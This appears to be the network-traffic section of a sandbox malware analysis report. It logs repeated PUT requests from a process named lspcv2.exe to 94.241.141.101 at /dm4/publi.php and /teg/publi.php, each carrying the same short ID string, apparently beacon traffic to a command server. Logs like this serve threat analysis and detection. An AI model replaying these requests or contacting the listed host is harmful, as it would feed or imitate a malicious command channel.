Nov 14, 2024 15:00:53.313968897 CET | 25 | OUT | Data Raw: 38 35 35 32 37 31 39 45 41 44 38 30 39 45 0d 0a 0d 0a 4e 30 56 30 37 0d 0a
Data Ascii: 8552719EAD809EN0V07
Nov 14, 2024 15:00:54.178261042 CET | 166 | IN | HTTP/1.1 200 OK
Date: Thu, 14 Nov 2024 14:00:54 GMT
Server: Apache/2.4.29 (Ubuntu)
Content-Length: 0
Connection: close
Content-Type: text/html; charset=UTF-8


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
20 | 192.168.2.4 | 49865 | 94.241.141.101 | 80 | 4020 | C:\Intrumental\lspcv2.exe
Timestamp | Bytes transferred | Direction | Data
Nov 14, 2024 15:00:53.958374023 CET | 199 | OUT | PUT /dm4/publi.php HTTP/1.0
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, */*
Content-Type: multipart/form-data
User-Agent: Mozilla/4.0
Host: 94.241.141.101
Content-Length: 25
Nov 14, 2024 15:00:53.964513063 CET | 25 | OUT | Data Raw: 38 35 35 32 37 31 39 45 41 44 38 30 39 45 0d 0a 0d 0a 4e 30 56 30 37 0d 0a
Data Ascii: 8552719EAD809EN0V07
Nov 14, 2024 15:00:54.846697092 CET | 166 | IN | HTTP/1.1 200 OK
Date: Thu, 14 Nov 2024 14:00:54 GMT
Server: Apache/2.4.29 (Ubuntu)
Content-Length: 0
Connection: close
Content-Type: text/html; charset=UTF-8


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
21 | 192.168.2.4 | 49866 | 94.241.141.101 | 80 | 7912 | C:\Intrumental\lspcv2.exe
Timestamp | Bytes transferred | Direction | Data
Nov 14, 2024 15:00:54.296992064 CET | 199 | OUT | PUT /teg/publi.php HTTP/1.0
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, */*
Content-Type: multipart/form-data
User-Agent: Mozilla/4.0
Host: 94.241.141.101
Content-Length: 25
Nov 14, 2024 15:00:54.301855087 CET | 25 | OUT | Data Raw: 38 35 35 32 37 31 39 45 41 44 38 30 39 45 0d 0a 0d 0a 4e 30 56 30 37 0d 0a
Data Ascii: 8552719EAD809EN0V07
Nov 14, 2024 15:00:55.404917002 CET | 166 | IN | HTTP/1.1 200 OK
Date: Thu, 14 Nov 2024 14:00:55 GMT
Server: Apache/2.4.29 (Ubuntu)
Content-Length: 0
Connection: close
Content-Type: text/html; charset=UTF-8


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
22 | 192.168.2.4 | 49872 | 94.241.141.101 | 80 | 4020 | C:\Intrumental\lspcv2.exe
Timestamp | Bytes transferred | Direction | Data
Nov 14, 2024 15:00:54.970736980 CET | 199 | OUT | PUT /dm4/publi.php HTTP/1.0
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, */*
Content-Type: multipart/form-data
User-Agent: Mozilla/4.0
Host: 94.241.141.101
Content-Length: 25
Nov 14, 2024 15:00:54.976972103 CET | 25 | OUT | Data Raw: 38 35 35 32 37 31 39 45 41 44 38 30 39 45 0d 0a 0d 0a 4e 30 56 30 37 0d 0a
Data Ascii: 8552719EAD809EN0V07
Nov 14, 2024 15:00:55.870425940 CET | 166 | IN | HTTP/1.1 200 OK
Date: Thu, 14 Nov 2024 14:00:55 GMT
Server: Apache/2.4.29 (Ubuntu)
Content-Length: 0
Connection: close
Content-Type: text/html; charset=UTF-8


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
23 | 192.168.2.4 | 49879 | 94.241.141.101 | 80 | 4020 | C:\Intrumental\lspcv2.exe
Timestamp | Bytes transferred | Direction | Data
Nov 14, 2024 15:00:55.999396086 CET | 199 | OUT | PUT /dm4/publi.php HTTP/1.0
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, */*
Content-Type: multipart/form-data
User-Agent: Mozilla/4.0
Host: 94.241.141.101
Content-Length: 25
Nov 14, 2024 15:00:56.005045891 CET | 25 | OUT | Data Raw: 38 35 35 32 37 31 39 45 41 44 38 30 39 45 0d 0a 0d 0a 4e 30 56 30 37 0d 0a
Data Ascii: 8552719EAD809EN0V07
Nov 14, 2024 15:00:56.894495010 CET | 166 | IN | HTTP/1.1 200 OK
Date: Thu, 14 Nov 2024 14:00:56 GMT
Server: Apache/2.4.29 (Ubuntu)
Content-Length: 0
Connection: close
Content-Type: text/html; charset=UTF-8


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
24 | 192.168.2.4 | 49886 | 94.241.141.101 | 80 | 7912 | C:\Intrumental\lspcv2.exe
Timestamp | Bytes transferred | Direction | Data
Nov 14, 2024 15:00:56.823956013 CET | 199 | OUT | PUT /teg/publi.php HTTP/1.0
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, */*
Content-Type: multipart/form-data
User-Agent: Mozilla/4.0
Host: 94.241.141.101
Content-Length: 25
Nov 14, 2024 15:00:56.828780890 CET | 25 | OUT | Data Raw: 38 35 35 32 37 31 39 45 41 44 38 30 39 45 0d 0a 0d 0a 4e 30 56 30 37 0d 0a
Data Ascii: 8552719EAD809EN0V07
Nov 14, 2024 15:00:57.697629929 CET | 166 | IN | HTTP/1.1 200 OK
Date: Thu, 14 Nov 2024 14:00:57 GMT
Server: Apache/2.4.29 (Ubuntu)
Content-Length: 0
Connection: close
Content-Type: text/html; charset=UTF-8


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
25 | 192.168.2.4 | 49887 | 94.241.141.101 | 80 | 4020 | C:\Intrumental\lspcv2.exe
Timestamp | Bytes transferred | Direction | Data
Nov 14, 2024 15:00:57.016057968 CET | 199 | OUT | PUT /dm4/publi.php HTTP/1.0
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, */*
Content-Type: multipart/form-data
User-Agent: Mozilla/4.0
Host: 94.241.141.101
Content-Length: 25
Nov 14, 2024 15:00:57.021212101 CET | 25 | OUT | Data Raw: 38 35 35 32 37 31 39 45 41 44 38 30 39 45 0d 0a 0d 0a 4e 30 56 30 37 0d 0a
Data Ascii: 8552719EAD809EN0V07
Nov 14, 2024 15:00:57.896414995 CET | 166 | IN | HTTP/1.1 200 OK
Date: Thu, 14 Nov 2024 14:00:57 GMT
Server: Apache/2.4.29 (Ubuntu)
Content-Length: 0
Connection: close
Content-Type: text/html; charset=UTF-8


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
26 | 192.168.2.4 | 49893 | 94.241.141.101 | 80 | 7912 | C:\Intrumental\lspcv2.exe
Timestamp | Bytes transferred | Direction | Data
Nov 14, 2024 15:00:57.846460104 CET | 199 | OUT | PUT /teg/publi.php HTTP/1.0
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, */*
Content-Type: multipart/form-data
User-Agent: Mozilla/4.0
Host: 94.241.141.101
Content-Length: 25
Nov 14, 2024 15:00:57.853971004 CET | 25 | OUT | Data Raw: 38 35 35 32 37 31 39 45 41 44 38 30 39 45 0d 0a 0d 0a 4e 30 56 30 37 0d 0a
Data Ascii: 8552719EAD809EN0V07
Nov 14, 2024 15:00:58.724276066 CET | 166 | IN | HTTP/1.1 200 OK
Date: Thu, 14 Nov 2024 14:00:58 GMT
Server: Apache/2.4.29 (Ubuntu)
Content-Length: 0
Connection: close
Content-Type: text/html; charset=UTF-8


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
27 | 192.168.2.4 | 49894 | 94.241.141.101 | 80 | 4020 | C:\Intrumental\lspcv2.exe
Timestamp | Bytes transferred | Direction | Data
Nov 14, 2024 15:00:58.032351971 CET | 199 | OUT | PUT /dm4/publi.php HTTP/1.0
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, */*
Content-Type: multipart/form-data
User-Agent: Mozilla/4.0
Host: 94.241.141.101
Content-Length: 25
Nov 14, 2024 15:00:58.037292004 CET | 25 | OUT | Data Raw: 38 35 35 32 37 31 39 45 41 44 38 30 39 45 0d 0a 0d 0a 4e 30 56 30 37 0d 0a
Data Ascii: 8552719EAD809EN0V07
Nov 14, 2024 15:00:58.930340052 CET | 166 | IN | HTTP/1.1 200 OK
Date: Thu, 14 Nov 2024 14:00:58 GMT
Server: Apache/2.4.29 (Ubuntu)
Content-Length: 0
Connection: close
Content-Type: text/html; charset=UTF-8


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
28 | 192.168.2.4 | 49900 | 94.241.141.101 | 80 | 7912 | C:\Intrumental\lspcv2.exe
Timestamp | Bytes transferred | Direction | Data
Nov 14, 2024 15:00:58.839517117 CET | 199 | OUT | PUT /teg/publi.php HTTP/1.0
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, */*
Content-Type: multipart/form-data
User-Agent: Mozilla/4.0
Host: 94.241.141.101
Content-Length: 25
Nov 14, 2024 15:00:58.844732046 CET | 25 | OUT | Data Raw: 38 35 35 32 37 31 39 45 41 44 38 30 39 45 0d 0a 0d 0a 4e 30 56 30 37 0d 0a
Data Ascii: 8552719EAD809EN0V07
Nov 14, 2024 15:00:59.725203991 CET | 166 | IN | HTTP/1.1 200 OK
Date: Thu, 14 Nov 2024 14:00:59 GMT
Server: Apache/2.4.29 (Ubuntu)
Content-Length: 0
Connection: close
Content-Type: text/html; charset=UTF-8


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
29 | 192.168.2.4 | 49901 | 94.241.141.101 | 80 | 4020 | C:\Intrumental\lspcv2.exe
Timestamp | Bytes transferred | Direction | Data
Nov 14, 2024 15:00:59.050777912 CET | 199 | OUT | PUT /dm4/publi.php HTTP/1.0
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, */*
Content-Type: multipart/form-data
User-Agent: Mozilla/4.0
Host: 94.241.141.101
Content-Length: 25
Nov 14, 2024 15:00:59.055967093 CET | 25 | OUT | Data Raw: 38 35 35 32 37 31 39 45 41 44 38 30 39 45 0d 0a 0d 0a 4e 30 56 30 37 0d 0a
Data Ascii: 8552719EAD809EN0V07
Nov 14, 2024 15:00:59.919243097 CET | 166 | IN | HTTP/1.1 200 OK
Date: Thu, 14 Nov 2024 14:00:59 GMT
Server: Apache/2.4.29 (Ubuntu)
Content-Length: 0
Connection: close
Content-Type: text/html; charset=UTF-8


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
30 | 192.168.2.4 | 49907 | 94.241.141.101 | 80 | 7912 | C:\Intrumental\lspcv2.exe
Timestamp | Bytes transferred | Direction | Data
Nov 14, 2024 15:00:59.842226982 CET | 199 | OUT | PUT /teg/publi.php HTTP/1.0
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, */*
Content-Type: multipart/form-data
User-Agent: Mozilla/4.0
Host: 94.241.141.101
Content-Length: 25
Nov 14, 2024 15:00:59.850084066 CET | 25 | OUT | Data Raw: 38 35 35 32 37 31 39 45 41 44 38 30 39 45 0d 0a 0d 0a 4e 30 56 30 37 0d 0a
Data Ascii: 8552719EAD809EN0V07
Nov 14, 2024 15:01:00.738975048 CET | 166 | IN | HTTP/1.1 200 OK
Date: Thu, 14 Nov 2024 14:01:00 GMT
Server: Apache/2.4.29 (Ubuntu)
Content-Length: 0
Connection: close
Content-Type: text/html; charset=UTF-8


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
31 | 192.168.2.4 | 49908 | 94.241.141.101 | 80 | 4020 | C:\Intrumental\lspcv2.exe
Timestamp | Bytes transferred | Direction | Data
Nov 14, 2024 15:01:00.051079988 CET | 199 | OUT | PUT /dm4/publi.php HTTP/1.0
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, */*
Content-Type: multipart/form-data
User-Agent: Mozilla/4.0
Host: 94.241.141.101
Content-Length: 25
Nov 14, 2024 15:01:00.056261063 CET | 25 | OUT | Data Raw: 38 35 35 32 37 31 39 45 41 44 38 30 39 45 0d 0a 0d 0a 4e 30 56 30 37 0d 0a
Data Ascii: 8552719EAD809EN0V07
Nov 14, 2024 15:01:00.923630953 CET | 166 | IN | HTTP/1.1 200 OK
Date: Thu, 14 Nov 2024 14:01:00 GMT
Server: Apache/2.4.29 (Ubuntu)
Content-Length: 0
Connection: close
Content-Type: text/html; charset=UTF-8


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
32 | 192.168.2.4 | 49914 | 94.241.141.101 | 80 | 7912 | C:\Intrumental\lspcv2.exe
Timestamp | Bytes transferred | Direction | Data
Nov 14, 2024 15:01:00.854114056 CET | 199 | OUT | PUT /teg/publi.php HTTP/1.0
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, */*
Content-Type: multipart/form-data
User-Agent: Mozilla/4.0
Host: 94.241.141.101
Content-Length: 25
Nov 14, 2024 15:01:00.859056950 CET | 25 | OUT | Data Raw: 38 35 35 32 37 31 39 45 41 44 38 30 39 45 0d 0a 0d 0a 4e 30 56 30 37 0d 0a
Data Ascii: 8552719EAD809EN0V07
Nov 14, 2024 15:01:01.740933895 CET | 166 | IN | HTTP/1.1 200 OK
Date: Thu, 14 Nov 2024 14:01:01 GMT
Server: Apache/2.4.29 (Ubuntu)
Content-Length: 0
Connection: close
Content-Type: text/html; charset=UTF-8


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
33 | 192.168.2.4 | 49917 | 94.241.141.101 | 80 | 4020 | C:\Intrumental\lspcv2.exe
Timestamp | Bytes transferred | Direction | Data
Nov 14, 2024 15:01:01.048125029 CET | 199 | OUT | PUT /dm4/publi.php HTTP/1.0
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, */*
Content-Type: multipart/form-data
User-Agent: Mozilla/4.0
Host: 94.241.141.101
Content-Length: 25
Nov 14, 2024 15:01:01.053181887 CET | 25 | OUT | Data Raw: 38 35 35 32 37 31 39 45 41 44 38 30 39 45 0d 0a 0d 0a 4e 30 56 30 37 0d 0a
Data Ascii: 8552719EAD809EN0V07
Nov 14, 2024 15:01:01.927894115 CET | 166 | IN | HTTP/1.1 200 OK
Date: Thu, 14 Nov 2024 14:01:01 GMT
Server: Apache/2.4.29 (Ubuntu)
Content-Length: 0
Connection: close
Content-Type: text/html; charset=UTF-8


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
34 | 192.168.2.4 | 49922 | 94.241.141.101 | 80 | 7912 | C:\Intrumental\lspcv2.exe
Timestamp | Bytes transferred | Direction | Data
Nov 14, 2024 15:01:01.854121923 CET | 199 | OUT | PUT /teg/publi.php HTTP/1.0
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, */*
Content-Type: multipart/form-data
User-Agent: Mozilla/4.0
Host: 94.241.141.101
Content-Length: 25
Nov 14, 2024 15:01:01.858995914 CET | 25 | OUT | Data Raw: 38 35 35 32 37 31 39 45 41 44 38 30 39 45 0d 0a 0d 0a 4e 30 56 30 37 0d 0a
Data Ascii: 8552719EAD809EN0V07
Nov 14, 2024 15:01:02.778789043 CET | 166 | IN | HTTP/1.1 200 OK
Date: Thu, 14 Nov 2024 14:01:02 GMT
Server: Apache/2.4.29 (Ubuntu)
Content-Length: 0
Connection: close
Content-Type: text/html; charset=UTF-8


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
35 | 192.168.2.4 | 49926 | 94.241.141.101 | 80 | 4020 | C:\Intrumental\lspcv2.exe
Timestamp | Bytes transferred | Direction | Data
Nov 14, 2024 15:01:02.058139086 CET | 199 | OUT | PUT /dm4/publi.php HTTP/1.0
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, */*
Content-Type: multipart/form-data
User-Agent: Mozilla/4.0
Host: 94.241.141.101
Content-Length: 25
Nov 14, 2024 15:01:02.063427925 CET | 25 | OUT | Data Raw: 38 35 35 32 37 31 39 45 41 44 38 30 39 45 0d 0a 0d 0a 4e 30 56 30 37 0d 0a
Data Ascii: 8552719EAD809EN0V07
Nov 14, 2024 15:01:02.940126896 CET | 166 | IN | HTTP/1.1 200 OK
Date: Thu, 14 Nov 2024 14:01:02 GMT
Server: Apache/2.4.29 (Ubuntu)
Content-Length: 0
Connection: close
Content-Type: text/html; charset=UTF-8


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
36 | 192.168.2.4 | 49932 | 94.241.141.101 | 80 | 7912 | C:\Intrumental\lspcv2.exe
Timestamp | Bytes transferred | Direction | Data
Nov 14, 2024 15:01:02.902209997 CET | 199 | OUT | PUT /teg/publi.php HTTP/1.0
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, */*
Content-Type: multipart/form-data
User-Agent: Mozilla/4.0
Host: 94.241.141.101
Content-Length: 25
Nov 14, 2024 15:01:02.909358978 CET | 25 | OUT | Data Raw: 38 35 35 32 37 31 39 45 41 44 38 30 39 45 0d 0a 0d 0a 4e 30 56 30 37 0d 0a
Data Ascii: 8552719EAD809EN0V07
Nov 14, 2024 15:01:03.819812059 CET | 166 | IN | HTTP/1.1 200 OK
Date: Thu, 14 Nov 2024 14:01:03 GMT
Server: Apache/2.4.29 (Ubuntu)
Content-Length: 0
Connection: close
Content-Type: text/html; charset=UTF-8


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
37 | 192.168.2.4 | 49933 | 94.241.141.101 | 80 | 4020 | C:\Intrumental\lspcv2.exe
Timestamp | Bytes transferred | Direction | Data
Nov 14, 2024 15:01:03.062345982 CET | 199 | OUT | PUT /dm4/publi.php HTTP/1.0
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, */*
Content-Type: multipart/form-data
User-Agent: Mozilla/4.0
Host: 94.241.141.101
Content-Length: 25
Nov 14, 2024 15:01:03.069999933 CET | 25 | OUT | Data Raw: 38 35 35 32 37 31 39 45 41 44 38 30 39 45 0d 0a 0d 0a 4e 30 56 30 37 0d 0a
Data Ascii: 8552719EAD809EN0V07
Nov 14, 2024 15:01:03.958962917 CET | 166 | IN | HTTP/1.1 200 OK
Date: Thu, 14 Nov 2024 14:01:03 GMT
Server: Apache/2.4.29 (Ubuntu)
Content-Length: 0
Connection: close
Content-Type: text/html; charset=UTF-8


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
38 | 192.168.2.4 | 49939 | 94.241.141.101 | 80 | 7912 | C:\Intrumental\lspcv2.exe
Timestamp | Bytes transferred | Direction | Data
Nov 14, 2024 15:01:03.937846899 CET | 199 | OUT | PUT /teg/publi.php HTTP/1.0
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, */*
Content-Type: multipart/form-data
User-Agent: Mozilla/4.0
Host: 94.241.141.101
Content-Length: 25
Nov 14, 2024 15:01:03.943078041 CET | 25 | OUT | Data Raw: 38 35 35 32 37 31 39 45 41 44 38 30 39 45 0d 0a 0d 0a 4e 30 56 30 37 0d 0a
Data Ascii: 8552719EAD809EN0V07
Nov 14, 2024 15:01:04.842451096 CET | 166 | IN | HTTP/1.1 200 OK
Date: Thu, 14 Nov 2024 14:01:04 GMT
Server: Apache/2.4.29 (Ubuntu)
Content-Length: 0
Connection: close
Content-Type: text/html; charset=UTF-8


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
39 | 192.168.2.4 | 49940 | 94.241.141.101 | 80 | 4020 | C:\Intrumental\lspcv2.exe
Timestamp | Bytes transferred | Direction | Data
Nov 14, 2024 15:01:04.077887058 CET | 199 | OUT | PUT /dm4/publi.php HTTP/1.0
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, */*
Content-Type: multipart/form-data
User-Agent: Mozilla/4.0
Host: 94.241.141.101
Content-Length: 25
Nov 14, 2024 15:01:04.083118916 CET | 25 | OUT | Data Raw: 38 35 35 32 37 31 39 45 41 44 38 30 39 45 0d 0a 0d 0a 4e 30 56 30 37 0d 0a
Data Ascii: 8552719EAD809EN0V07
Nov 14, 2024 15:01:04.984281063 CET | 166 | IN | HTTP/1.1 200 OK
Date: Thu, 14 Nov 2024 14:01:04 GMT
Server: Apache/2.4.29 (Ubuntu)
Content-Length: 0
Connection: close
Content-Type: text/html; charset=UTF-8


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
40 | 192.168.2.4 | 49946 | 94.241.141.101 | 80 | 7912 | C:\Intrumental\lspcv2.exe
Timestamp | Bytes transferred | Direction | Data
Nov 14, 2024 15:01:04.974242926 CET | 199 | OUT | PUT /teg/publi.php HTTP/1.0
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, */*
Content-Type: multipart/form-data
User-Agent: Mozilla/4.0
Host: 94.241.141.101
Content-Length: 25
Nov 14, 2024 15:01:04.982136011 CET | 25 | OUT | Data Raw: 38 35 35 32 37 31 39 45 41 44 38 30 39 45 0d 0a 0d 0a 4e 30 56 30 37 0d 0a
Data Ascii: 8552719EAD809EN0V07
Nov 14, 2024 15:01:05.856271982 CET | 166 | IN | HTTP/1.1 200 OK
Date: Thu, 14 Nov 2024 14:01:05 GMT
Server: Apache/2.4.29 (Ubuntu)
Content-Length: 0
Connection: close
Content-Type: text/html; charset=UTF-8


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
41 | 192.168.2.4 | 49947 | 94.241.141.101 | 80 | 4020 | C:\Intrumental\lspcv2.exe
Timestamp | Bytes transferred | Direction | Data
Nov 14, 2024 15:01:05.196218967 CET | 199 | OUT | PUT /dm4/publi.php HTTP/1.0
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, */*
Content-Type: multipart/form-data
User-Agent: Mozilla/4.0
Host: 94.241.141.101
Content-Length: 25
Nov 14, 2024 15:01:05.201185942 CET | 25 | OUT | Data Raw: 38 35 35 32 37 31 39 45 41 44 38 30 39 45 0d 0a 0d 0a 4e 30 56 30 37 0d 0a
Data Ascii: 8552719EAD809EN0V07
Nov 14, 2024 15:01:06.060261011 CET | 166 | IN | HTTP/1.1 200 OK
Date: Thu, 14 Nov 2024 14:01:05 GMT
Server: Apache/2.4.29 (Ubuntu)
Content-Length: 0
Connection: close
Content-Type: text/html; charset=UTF-8


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
42 | 192.168.2.4 | 49949 | 94.241.141.101 | 80 | 3220 | C:\Intrumental\lspcv2.exe
Timestamp | Bytes transferred | Direction | Data
Nov 14, 2024 15:01:05.300327063 CET | 199 | OUT | PUT /dm4/publi.php HTTP/1.0
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, */*
Content-Type: multipart/form-data
User-Agent: Mozilla/4.0
Host: 94.241.141.101
Content-Length: 25
Nov 14, 2024 15:01:05.305358887 CET | 25 | OUT | Data Raw: 38 35 35 32 37 31 39 45 41 44 38 30 39 45 0d 0a 0d 0a 4e 30 56 30 37 0d 0a
Data Ascii: 8552719EAD809EN0V07
Nov 14, 2024 15:01:06.184755087 CET | 166 | IN | HTTP/1.1 200 OK
Date: Thu, 14 Nov 2024 14:01:06 GMT
Server: Apache/2.4.29 (Ubuntu)
Content-Length: 0
Connection: close
Content-Type: text/html; charset=UTF-8


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
43 | 192.168.2.4 | 49954 | 94.241.141.101 | 80 | 7912 | C:\Intrumental\lspcv2.exe
Timestamp | Bytes transferred | Direction | Data
Nov 14, 2024 15:01:05.979614973 CET | 199 | OUT | PUT /teg/publi.php HTTP/1.0
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, */*
Content-Type: multipart/form-data
User-Agent: Mozilla/4.0
Host: 94.241.141.101
Content-Length: 25
Nov 14, 2024 15:01:05.984591961 CET | 25 | OUT | Data Raw: 38 35 35 32 37 31 39 45 41 44 38 30 39 45 0d 0a 0d 0a 4e 30 56 30 37 0d 0a
Data Ascii: 8552719EAD809EN0V07
Nov 14, 2024 15:01:06.864527941 CET | 166 | IN | HTTP/1.1 200 OK
Date: Thu, 14 Nov 2024 14:01:06 GMT
Server: Apache/2.4.29 (Ubuntu)
Content-Length: 0
Connection: close
Content-Type: text/html; charset=UTF-8


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
44 | 192.168.2.4 | 49956 | 94.241.141.101 | 80 | 4020 | C:\Intrumental\lspcv2.exe
Timestamp | Bytes transferred | Direction | Data
Nov 14, 2024 15:01:06.186877012 CET | 199 | OUT | PUT /dm4/publi.php HTTP/1.0
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, */*
Content-Type: multipart/form-data
User-Agent: Mozilla/4.0
Host: 94.241.141.101
Content-Length: 25
Nov 14, 2024 15:01:06.200933933 CET | 25 | OUT | Data Raw: 38 35 35 32 37 31 39 45 41 44 38 30 39 45 0d 0a 0d 0a 4e 30 56 30 37 0d 0a
Data Ascii: 8552719EAD809EN0V07
Nov 14, 2024 15:01:07.084415913 CET | 166 | IN | HTTP/1.1 200 OK
Date: Thu, 14 Nov 2024 14:01:06 GMT
Server: Apache/2.4.29 (Ubuntu)
Content-Length: 0
Connection: close
Content-Type: text/html; charset=UTF-8


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
45 | 192.168.2.4 | 49957 | 94.241.141.101 | 80 | 3220 | C:\Intrumental\lspcv2.exe
Timestamp | Bytes transferred | Direction | Data
Nov 14, 2024 15:01:06.312882900 CET | 199 | OUT | PUT /dm4/publi.php HTTP/1.0
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, */*
Content-Type: multipart/form-data
User-Agent: Mozilla/4.0
Host: 94.241.141.101
Content-Length: 25
Nov 14, 2024 15:01:06.318339109 CET | 25 | OUT | Data Raw: 38 35 35 32 37 31 39 45 41 44 38 30 39 45 0d 0a 0d 0a 4e 30 56 30 37 0d 0a
Data Ascii: 8552719EAD809EN0V07
Nov 14, 2024 15:01:07.217459917 CET | 166 | IN | HTTP/1.1 200 OK
Date: Thu, 14 Nov 2024 14:01:07 GMT
Server: Apache/2.4.29 (Ubuntu)
Content-Length: 0
Connection: close
Content-Type: text/html; charset=UTF-8


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
46 | 192.168.2.4 | 49963 | 94.241.141.101 | 80 | 7912 | C:\Intrumental\lspcv2.exe
Timestamp | Bytes transferred | Direction | Data
Nov 14, 2024 15:01:06.982214928 CET | 199 | OUT | PUT /teg/publi.php HTTP/1.0
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, */*
Content-Type: multipart/form-data
User-Agent: Mozilla/4.0
Host: 94.241.141.101
Content-Length: 25
Nov 14, 2024 15:01:06.990006924 CET | 25 | OUT | Data Raw: 38 35 35 32 37 31 39 45 41 44 38 30 39 45 0d 0a 0d 0a 4e 30 56 30 37 0d 0a
Data Ascii: 8552719EAD809EN0V07
Nov 14, 2024 15:01:07.896181107 CET | 166 | IN | HTTP/1.1 200 OK
Date: Thu, 14 Nov 2024 14:01:07 GMT
Server: Apache/2.4.29 (Ubuntu)
Content-Length: 0
Connection: close
Content-Type: text/html; charset=UTF-8


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
47 | 192.168.2.4 | 49964 | 94.241.141.101 | 80 | 4020 | C:\Intrumental\lspcv2.exe
Timestamp | Bytes transferred | Direction | Data
Nov 14, 2024 15:01:07.225634098 CET | 199 | OUT | PUT /dm4/publi.php HTTP/1.0
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, */*
Content-Type: multipart/form-data
User-Agent: Mozilla/4.0
Host: 94.241.141.101
Content-Length: 25
Nov 14, 2024 15:01:07.232024908 CET | 25 | OUT | Data Raw: 38 35 35 32 37 31 39 45 41 44 38 30 39 45 0d 0a 0d 0a 4e 30 56 30 37 0d 0a
Data Ascii: 8552719EAD809EN0V07
Nov 14, 2024 15:01:08.124144077 CET | 166 | IN | HTTP/1.1 200 OK
Date: Thu, 14 Nov 2024 14:01:07 GMT
Server: Apache/2.4.29 (Ubuntu)
Content-Length: 0
Connection: close
Content-Type: text/html; charset=UTF-8


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
48 | 192.168.2.4 | 49968 | 94.241.141.101 | 80 | 3220 | C:\Intrumental\lspcv2.exe
Timestamp | Bytes transferred | Direction | Data
Nov 14, 2024 15:01:07.346370935 CET | 199 | OUT | PUT /dm4/publi.php HTTP/1.0
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, */*
Content-Type: multipart/form-data
User-Agent: Mozilla/4.0
Host: 94.241.141.101
Content-Length: 25
Nov 14, 2024 15:01:07.354017973 CET | 25 | OUT | Data Raw: 38 35 35 32 37 31 39 45 41 44 38 30 39 45 0d 0a 0d 0a 4e 30 56 30 37 0d 0a
Data Ascii: 8552719EAD809EN0V07
Nov 14, 2024 15:01:08.230052948 CET | 166 | IN | HTTP/1.1 200 OK
Date: Thu, 14 Nov 2024 14:01:08 GMT
Server: Apache/2.4.29 (Ubuntu)
Content-Length: 0
Connection: close
Content-Type: text/html; charset=UTF-8


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
49 | 192.168.2.4 | 49971 | 94.241.141.101 | 80 | 7912 | C:\Intrumental\lspcv2.exe
Timestamp | Bytes transferred | Direction | Data
Nov 14, 2024 15:01:08.011271000 CET | 199 | OUT | PUT /teg/publi.php HTTP/1.0
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, */*
Content-Type: multipart/form-data
User-Agent: Mozilla/4.0
Host: 94.241.141.101
Content-Length: 25
Nov 14, 2024 15:01:08.016823053 CET | 25 | OUT | Data Raw: 38 35 35 32 37 31 39 45 41 44 38 30 39 45 0d 0a 0d 0a 4e 30 56 30 37 0d 0a
Data Ascii: 8552719EAD809EN0V07
Nov 14, 2024 15:01:08.891042948 CET | 166 | IN | HTTP/1.1 200 OK
Date: Thu, 14 Nov 2024 14:01:08 GMT
Server: Apache/2.4.29 (Ubuntu)
Content-Length: 0
Connection: close
Content-Type: text/html; charset=UTF-8


